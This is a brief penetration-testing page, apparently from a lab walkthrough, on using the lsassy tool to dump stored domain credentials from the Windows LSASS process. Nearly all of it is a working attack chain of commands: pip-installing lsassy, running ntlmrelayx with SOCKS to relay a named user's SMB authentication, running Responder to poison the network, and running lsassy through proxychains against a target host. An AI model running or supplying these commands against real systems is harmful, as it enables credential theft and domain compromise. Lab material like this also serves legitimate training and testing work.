Lsassy

Use lsassy to get the lsass process stored credentials
Domain accounts informations are stored in the LSASS process so make a dump of this process can give you more domain accounts and privileges.
Lsassy allow you to dump lsass remotely (very more convenient then doing a procdump, download of the lsass dump file and doing pypykatz or mimikatz locally), it do all the painful actions like dump and read lsass content for you (it also dump only the usefull part of the lsass dump optimizing the time of transfer). (lsassy also exist as a cme module)

Install LSASSY

python3 -m pip install lsassy

Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Run LSASSY

proxychains lsassy --no-pass -d NORTH -u fernando.alonzo 192.168.56.22

Last updated 2 years ago